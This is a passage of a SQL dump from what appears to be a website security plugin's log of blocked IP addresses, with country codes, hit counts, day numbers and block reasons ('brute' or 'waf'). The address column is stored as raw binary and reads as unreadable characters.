0\0gk)','VN',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0+FK','IN',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0k','LU',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0|߮','CN',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0u>','GB',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0{','US',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0','PL',2,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0n\'7','PK',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0#ժ','SG',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0h','US',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0\\̋v','US',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0/','HK',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0_a\Z','CZ',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0U','RU',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0[','IR',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0t','SG',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0\"','US',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0','DE',4,19730,'waf'),('\0\0\0\0\0\0\0\0\0\0}','VN',1,19730,'brute'),('&\0\0\0\0\0\r6','US',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0w','IN',15,19730,'waf'),('\0\0\0\0\0\0\0\0\0\0N ','CZ',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0՘','NL',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0F=','GB',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0-=','US',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0՘','NL',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0>*o','US',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0k','LU',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0F=','GB',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0՘','NL',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0Kݴ','CA',1,19730,'brute'),('&\0\0\0\0\0\0','US',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0ν;','DE',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0[y[','FR',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0ٹ','US',2,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0E','CA',1,19730,'brute'),('*\0 %\0@\0\0\0\0A','DE',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\02tf','US',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0%-','FR',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0D4D','US',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0Y\'m','RO',2,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0','CH',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0\"]B','IN',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0[z','ES',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0LA','DE',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0K','CA',1,19730,'brute'),('*\0\0\0\0\0\0','GB',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0H','SG',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0\ZzP','RU',1,19730,'brute'),('$\0a\0\0\0\0\0\0\0m','SG',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0kY','NL',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0+','CH',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0I','IN',1,19730,'brute'),('&\0<\0\0\0\0<','US',1,19730,'brute'),(' A\0\0\0\0\0\0\0\0','FR',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0','DE',81,19730,'waf'),('\0\0\0\0\0\0\0\0\0\0&G','UA',1,19730,'waf'),(' \0\0\0\0\0\0\0','CH',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0ޡ','NL',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0ٵ','CA',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0%','US',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0hL','SG',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0k(','LU',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0j&','FR',2,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0# I','US',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\0l','IE',1,19730,'brute'),('&\0\0\0\0\0\0$\0','US',1,19730,'brute'),('\0\0\0\0\0\0\0\0\0\01','CN',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0','US',1,19729,'brute'),('*{@߉=\0\0\0\0\0\0\0','LT',1,19729,'brute'),(' A\0$T\0\0\0\0\0\0\0\0','FR',2,19729,'brute'),('&S\01\0\0\0\0\0\0\0&','CA',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0K','CA',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0\\P','US',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0$','US',1,19729,'brute'),('*@\0\0IUDs\\','DE',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\07','US',1,19729,'brute'),(' A\0>\0\0\0\0\0\0\0\0','FR',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0U[','BG',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0c','US',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0n{','IN',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0%\rQ','NL',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0g','SG',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0bf','DE',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0=&','IN',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0V','DZ',1,19729,'waf'),(' t\0T\0M\\F','GB',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\08-','SE',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0[\\','BG',6,19729,'waf'),('\0\0\0\0\0\0\0\0\0\0%x','JP',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0b0','US',2,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0v','SG',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0hၠ','US',4,19729,'waf'),('\0\0\0\0\0\0\0\0\0\0#`','US',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0~b','SG',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\09!','FR',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0^','FR',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0@','AT',1,19729,'brute'),('$\0a\0\0\0\0\0\0\0m','SG',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0F=','GB',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0ׂ','US',2,19729,'brute'),('*cC\0 fC','NL',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0g\Z ','VN',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0j&','CN',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0^i','IE',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\08','SG',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0','DE',127,19729,'waf'),('\0\0\0\0\0\0\0\0\0\0>f','SE',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0Y','US',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0՘','NL',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0','NL',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0@','NL',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0','NL',2,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0б','FR',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0͹~a','US',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0;','SG',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0zb','GB',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0aJ\"','US',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0qr','US',1,19729,'brute'),('&\0\0\0\0\0\0$\0','US',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0','NL',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0U','US',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\01Q','CN',1,19729,'brute'),('$\0(Bዌ','SG',1,19729,'brute'),('* r\0\0\0GV\0 {','NL',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0','US',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0Dz','IN',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0/jɆ','CN',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\03','US',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0g\r','VN',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0`','US',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\01','VN',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\02> ','US',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0|߮','CN',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0EG','US',1,19729,'brute'),('*\0\0\0\0\"','DE',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0| p','VN',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0CޓC','US',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0DR','IN',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0C','US',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0-}','VN',1,19729,'brute'),('&\0<\0\0\0\0<','US',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0gZ','VN',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0v','US',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0HGL','US',2,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0#ы{','US',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0m0','US',1,19729,'brute'),('*\0ր\0 \0P\0\0\0\0\0\0ʹ','GB',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0H@s','US',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0ɿ','US',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0#B','ID',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0St','GB',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0t','RO',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0H','US',1,19729,'brute'),('&@ W\'D\0\0\0\0\0\0\0','US',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0կB','LV',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0ɽ<','US',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0b','BR',1,19729,'brute'),('&\0\0\0\0\0\nA2o','US',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0\\','FR',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\02>0','US',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0\"A\0','CH',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0;','DE',1,19729,'brute'),('&\0\0\0\0\0','US',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0D8','IN',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0qH','VN',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0x\\','CN',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0`d','UZ',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0C','SG',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0k','US',2,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0i','CH',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0[','IR',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0! ','AT',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0K','HK',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\03','SG',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0DP','IN',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0gs','BD',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0H,','US',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\03','FR',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0Hӱ','SG',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0D','IN',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0D','US',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0D','IN',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0D','IN',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0m?','US',2,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0','US',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0H','US',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0g*','IN',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0[y[','FR',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0g]','SG',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0+','US',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0','US',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0b^','SG',2,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0\0[','VN',2,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0gx','IN',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0S#@','DE',2,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0gy\Z','IN',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\03k','FR',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0A','RU',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0z\"','CN',2,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0Ո]','DE',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0pW','FR',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0\"KA','US',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0\0@','ZA',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0c[','US',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0٪','NO',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0՘','NL',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0H','SG',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0\\̊','US',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\02tf','US',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\03q','FR',1,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0} ','FR',2,19729,'brute'),('\0\0\0\0\0\0\0\0\0\0@','IN',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0M','FR',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0N ','CZ',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0t>ή','CN',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0-=','US',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0[z','ES',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0\\9','AU',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0B','FR',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0m~','GB',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0h','US',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0hP','SE',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0bF9<','IN',6,19728,'waf'),('*\0\0\0\0\0\0\0\0\0','UA',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0;','SG',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0>6;','AT',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0WE','CO',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0-=E','US',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0','CZ',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0э-','US',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0`','US',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\03k','FR',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0Al\'3','FI',1,19728,'brute'),(' A9\0\0\0\0\0\0\0\0','FR',2,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0q+','JP',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0[z\n','PL',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\02tf','US',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0Ԙn','US',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0}ѫ','VN',1,19728,'brute'),('&S\01\0\0\0\0\0\0\0&','CA',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0՘Y','NL',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0k','LU',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0[\\:','BG',8,19728,'waf'),(' A\0\0\0\0\0\0\0\0','FR',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0\rO','IE',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0Kݫ','CA',2,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0#B','ID',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0S#@','DE',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0[-','ES',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0՘#','NL',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0\\P','US',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0^','FR',2,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0-=','US',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0b>a','US',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0\"]B','IN',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0ǽ{','CA',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0>B','GB',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\03d','CA',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0՘','NL',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0Y','US',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0@*+','US',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0>f','SE',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0b9','US',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0Y{i','DE',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0zb','GB',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0ʬ\Z','JP',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0]','IN',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0]','CA',1,19728,'brute'),(' A0\0\0\0\0\0\0\0M','FR',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0[f','RO',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0^@x','BG',7,19728,'waf'),('\0\0\0\0\0\0\0\0\0\0+?','CN',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0C','US',1,19728,'brute'),('*\0\0\0\0\0\0/p','NL',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0-wR4','VN',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0S','US',1,19728,'waf'),('\0\0\0\0\0\0\0\0\0\06%#','FR',2,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0j&','FR',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\06%','FR',1,19728,'brute'),('*\0\0\0\0\0\0','GB',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0','US',2,19728,'brute'),(' D\0A0ȳ','SG',21,19728,'waf'),('*!\0\0\0\0\0\0\0','DE',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0U[','BG',1,19728,'brute'),('$\0a\0\0\0\0\0\0z ','IN',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0D','IN',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0','DE',1,19728,'brute'),(' A\0$T\0\0\0\0\0\0\0\0','FR',2,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0m$n','US',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0k','LU',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0k^','LU',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0','DE',14,19728,'waf'),('\0\0\0\0\0\0\0\0\0\0՘','NL',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0%\rQ','NL',1,19728,'brute'),('\0\0\0\0\0\0\0\0\0\0+\n','US',1,19727,'waf'),('\0\0\0\0\0\0\0\0\0\0\\?Α','UZ',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0Kw','DE',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0','CA',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0>f','SE',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0\"A\0','CH',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\06|','US',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0H','SG',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\09','FR',1,19727,'waf'),('\0\0\0\0\0\0\0\0\0\0Y{i','DE',1,19727,'brute'),(' D\0A0ȳ','SG',21,19727,'waf'),('\0\0\0\0\0\0\0\0\0\0F=','GB',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0M','US',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\09!','FR',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0}','FR',2,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0k','US',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0t>ή','CN',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0;','NO',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0م','IT',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0u','US',1,19727,'brute'),('$\0\0830\06','JP',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0n','ID',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0O','IT',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0t*','DE',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0}ѫ','VN',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0^E$','BG',6,19727,'waf'),('\0\0\0\0\0\0\0\0\0\0W','DE',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0[\\:','BG',2,19727,'waf'),('\0\0\0\0\0\0\0\0\0\0Y\'m','RO',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0e','RU',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0@','US',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0eD\'','US',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0B','SG',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0\0m','US',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0;}J','ID',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0m','HK',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0Wb','FR',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0-=E','US',1,19727,'brute'),('&S\01\0\0\0\0\0\0\0&','CA',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0^@K','BG',207,19727,'waf'),('\0\0\0\0\0\0\0\0\0\0','NL',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0^@x','BG',7,19727,'waf'),('\0\0\0\0\0\0\0\0\0\0S#@','DE',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\03','FR',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0a','NL',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0He','US',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0} ','FR',2,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0/k!\Z','CN',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0{','US',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0DR','IN',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0h-)-','NL',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0\'e','CN',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0aJ\"','US',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0m?','US',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0\\','FR',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0~Ν','BR',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\03','CA',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0.u','FR',1,19727,'brute'),('*PT\0e','NL',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0#ij','US',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0X$','IR',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0t>','CN',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0[\\','BG',6,19727,'waf'),('\0\0\0\0\0\0\0\0\0\02> ','US',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0 ','BR',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0:','SG',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0 c','US',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0m','US',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0D3','IN',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0>f','SE',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0\Z','US',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0JTL','US',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0͹v','US',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0U[','BG',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0D\\','IN',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0 k','US',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0xl','CN',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0St','GB',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0Dz','IN',1,19727,'brute'),('&\0`\0\0\0\0\0Xͼ','US',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0DT','GB',2,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0D8','IN',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0m0','US',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0Yh','DE',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0DAzl','US',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0R@','NL',2,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0`d','UZ',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0\\P','US',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0g8','CN',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0D','IN',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0','DE',11,19727,'waf'),('\0\0\0\0\0\0\0\0\0\0.i','FR',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0`','SG',2,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0\'g','CN',2,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0n\'7','PK',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0\\̊','US',2,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0bF1U','IN',1,19727,'waf'),('*\0\0\0\0\0\0\0\0\0','UA',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0$','GB',3,19727,'waf'),('\0\0\0\0\0\0\0\0\0\0=Z','IE',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0\"KA','US',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0\"','US',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0YJ','GB',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0Y','US',2,19727,'brute'),('&\0\0@','US',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0\0@','ZA',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0\\','FR',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0dM','US',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0՘v','NL',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0&G','UA',1,19727,'waf'),('\0\0\0\0\0\0\0\0\0\0h','US',2,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0э8','US',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0t','RO',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0@','IN',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0[\\X','BG',4,19727,'waf'),('\0\0\0\0\0\0\0\0\0\0b7','US',1,19727,'brute'),('\0\0\0\0\0\0\0\0\0\0j&','FR',3,19727,'brute'),('\0\0\0\0\0\0\0\0\0\03[<','FR',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0$o;','US',1,19726,'brute'),('\0\0\0\0\0\0\0\0\0\0\\̊','US',1,19726,'brute'),